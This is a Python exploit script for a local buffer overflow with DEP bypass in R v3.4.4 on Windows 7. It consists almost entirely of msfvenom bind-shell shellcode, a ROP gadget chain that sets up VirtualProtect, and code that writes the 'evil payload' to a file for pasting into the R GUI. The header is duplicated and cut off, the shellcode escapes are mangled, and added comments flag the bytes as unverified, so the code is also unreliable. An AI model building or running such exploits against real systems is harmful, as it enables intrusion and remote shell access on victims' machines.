#!/usr/bin/python
#################################################################################################################
# Exploit Title : R v3.4.4 - Local Buffer Overflow (D #!/usr/bin/python
#################################################################################################################
# Exploit Title : R v3.4.4 - Local Buffer Overflow (DEP Bypass) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : https://www.r-project.org/ #
# Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe #
# Tested on OS : Microsoft Windows 7 Enterprise - SP1 (x86) #
# Steps to reproduce : under GUI preferences, paste payload.txt contents into 'Language for menus and messages' #
#################################################################################################################

# Credit to bzyo for finding the bug (44516)

import struct

#root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "x00x0ax0dx0e" -f python -v shellcode
#Payload size: 718 bytes
# Encoded payload as emitted by the msfvenom command above, accumulated into a
# single string by repeated concatenation (one 12-token line per statement).
# NOTE(review): in this copy of the listing the escape sequences appear to have
# been mangled during extraction, so len(shellcode) as printed here will not
# match the 718-byte size stated above; treat the bytes below as unverified.
shellcode = ""
shellcode += "x89xe0xdbxd2xd9x70xf4x5bx53x59x49x49"
shellcode += "x49x49x49x49x49x49x49x49x43x43x43x43"
shellcode += "x43x43x37x51x5ax6ax41x58x50x30x41x30"
shellcode += "x41x6bx41x41x51x32x41x42x32x42x42x30"
shellcode += "x42x42x41x42x58x50x38x41x42x75x4ax49"
shellcode += "x69x6cx59x78x6cx42x77x70x33x30x37x70"
shellcode += "x31x70x6bx39x6ax45x65x61x39x50x72x44"
shellcode += "x6ex6bx30x50x56x50x4ex6bx62x72x56x6c"
shellcode += "x6cx4bx31x42x34x54x4cx4bx62x52x64x68"
shellcode += "x56x6fx68x37x70x4ax61x36x55x61x79x6f"
shellcode += "x6ex4cx75x6cx73x51x51x6cx67x72x46x4c"
shellcode += "x57x50x4bx71x5ax6fx36x6dx76x61x6bx77"
shellcode += "x7ax42x39x62x76x32x73x67x6ex6bx36x32"
shellcode += "x72x30x4ex6bx73x7ax55x6cx4ex6bx62x6c"
shellcode += "x42x31x72x58x38x63x51x58x35x51x6bx61"
shellcode += "x52x71x4ex6bx72x79x31x30x57x71x78x53"
shellcode += "x6cx4bx50x49x64x58x6bx53x77x4ax70x49"
shellcode += "x6ex6bx37x44x4ex6bx67x71x4bx66x45x61"
shellcode += "x69x6fx6cx6cx49x51x6ax6fx46x6dx57x71"
shellcode += "x5ax67x56x58x39x70x42x55x4bx46x74x43"
shellcode += "x53x4dx59x68x35x6bx73x4dx47x54x64x35"
shellcode += "x5ax44x36x38x6cx4bx56x38x57x54x76x61"
shellcode += "x38x53x43x56x4cx4bx64x4cx30x4bx6cx4b"
shellcode += "x33x68x35x4cx57x71x59x43x6cx4bx36x64"
shellcode += "x6cx4bx46x61x4ex30x6bx39x63x74x47x54"
shellcode += "x55x74x31x4bx43x6bx50x61x71x49x52x7a"
shellcode += "x62x71x6bx4fx6bx50x61x4fx51x4fx32x7a"
shellcode += "x6cx4bx66x72x5ax4bx4cx4dx71x4dx50x68"
shellcode += "x76x53x45x62x65x50x75x50x31x78x73x47"
shellcode += "x71x63x74x72x31x4fx62x74x75x38x50x4c"
shellcode += "x70x77x55x76x36x67x49x6fx6bx65x6dx68"
shellcode += "x7ax30x73x31x55x50x65x50x36x49x78x44"
shellcode += "x33x64x62x70x65x38x65x79x6dx50x30x6b"
shellcode += "x43x30x39x6fx39x45x31x7ax56x68x70x59"
shellcode += "x70x50x69x72x59x6dx37x30x70x50x71x50"
shellcode += "x50x50x33x58x39x7ax46x6fx79x4fx6dx30"
shellcode += "x59x6fx69x45x7ax37x75x38x65x52x43x30"
shellcode += "x37x61x63x6cx4fx79x5ax46x31x7ax34x50"
shellcode += "x30x56x31x47x45x38x39x52x79x4bx66x57"
shellcode += "x42x47x59x6fx5ax75x50x57x51x78x6cx77"
shellcode += "x48x69x54x78x69x6fx6bx4fx59x45x72x77"
shellcode += "x75x38x33x44x7ax4cx75x6bx39x71x49x6f"
shellcode += "x78x55x71x47x6cx57x75x38x70x75x70x6e"
shellcode += "x42x6dx35x31x79x6fx38x55x72x48x70x63"
shellcode += "x42x4dx71x74x37x70x4fx79x79x73x71x47"
shellcode += "x70x57x71x47x74x71x78x76x53x5ax42x32"
shellcode += "x62x79x52x76x6bx52x59x6dx35x36x79x57"
shellcode += "x52x64x35x74x57x4cx37x71x43x31x4ex6d"
shellcode += "x50x44x36x44x56x70x59x56x47x70x42x64"
shellcode += "x46x34x70x50x36x36x50x56x50x56x71x56"
shellcode += "x42x76x30x4ex73x66x76x36x66x33x76x36"
shellcode += "x32x48x42x59x68x4cx55x6fx6dx56x49x6f"
shellcode += "x6bx65x4bx39x59x70x72x6ex70x56x51x56"
shellcode += "x4bx4fx34x70x51x78x34x48x4ex67x37x6d"
shellcode += "x51x70x59x6fx38x55x6dx6bx6cx30x48x35"
shellcode += "x69x32x72x76x62x48x4cx66x5ax35x4fx4d"
shellcode += "x4dx4dx69x6fx4ax75x65x6cx67x76x73x4c"
shellcode += "x47x7ax4fx70x59x6bx4bx50x70x75x57x75"
shellcode += "x6fx4bx53x77x55x43x64x32x52x4fx51x7a"
shellcode += "x53x30x46x33x4bx4fx4bx65x41x41"

'''
Output generated by mona.py v2.0, rev 582 - Immunity Debugger
--------------------------------------------
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--------------------------------------------
'''

# Gadget chain implementing the VirtualProtect() register setup listed in the
# mona.py block above.  Each entry is packed as one little-endian DWORD and
# the resulting byte string is identical to the original step-by-step chain;
# the addresses and their annotations are reproduced unchanged.
rop = b''.join(struct.pack('<L', gadget) for gadget in (
    0x6cacc7e2,  # POP EAX # RETN [R.dll]
    0x643cb170,  # ptr to &VirtualProtect() [IAT Riconv.dll]
    0x6e7d5435,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll]
    0x6ca347fa,  # XCHG EAX,ESI # RETN [R.dll]
    0x6cb7429a,  # POP EBP # RETN [R.dll]
    0x6ca2a9bd,  # & jmp esp [R.dll]
    0x64c45db2,  # POP EAX # RETN [methods.dll]
    0xfffffaff,  # value to negate, will become 0x00000501
    0x643c361a,  # NEG EAX # RETN [Riconv.dll]
    0x6ca33b8a,  # XCHG EAX,EBX # RETN [R.dll]
    0x6cbef3e4,  # POP EAX # RETN [R.dll]
    0xffffffc0,  # Value to negate, will become 0x00000040
    0x6ff3a39a,  # NEG EAX # RETN [grDevices.dll]
    0x6ca558be,  # XCHG EAX,EDX # RETN [R.dll]
    0x6cbe90a8,  # POP ECX # RETN [R.dll]
    0x6ff863c1,  # &Writable location [grDevices.dll]
    0x6cbe097f,  # POP EDI # RETN [R.dll]
    0x6375fe5c,  # RETN (ROP NOP) [Rgraphapp.dll]
    0x6c998f58,  # POP EAX # RETN [R.dll]
    0x90909090,  # nop
    0x6fedfa6c,  # PUSHAD # RETN [grDevices.dll]
))

# Assemble the full payload in one pass; the pieces and their order are the
# same as the original incremental build, and the trailing pad keeps the
# total at the fixed 5000 the original formula assumes.
# NOTE: the name `buffer` shadows a Python 2 builtin; it is kept because the
# rest of the script reads it by this name.
buffer = ''.join([
    'x41' * 292,                          # filler to EIP
    struct.pack('<L', 0x6fef93c6),        # POP ESI # RETN [grDevices.dll]
    'x41' * 4,                            # compensate for pop esi
    rop,                                  # VirtualProtect() gadget chain
    'x90' * 50,                           # nop sled
    shellcode,
    'x90' * (5000-292-4-4-len(rop)-50-len(shellcode)),  # pad to fixed size
])

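# Write the assembled payload to payload.txt.
#
# The original open()/write()/close() sequence leaked the file handle when
# write() raised; `with` guarantees it is closed on every path.  The
# reporting is unchanged, but a failure now exits non-zero instead of
# silently returning success after printing the error.
try:
    with open('payload.txt', 'w') as f:
        print('[+] Creating %s bytes evil payload..' % len(buffer))
        f.write(buffer)
    print('[+] File created!')
except Exception as e:
    # Top-level boundary of the script: report, then signal failure to the
    # caller via the exit status.
    print(e)
    raise SystemExit(1)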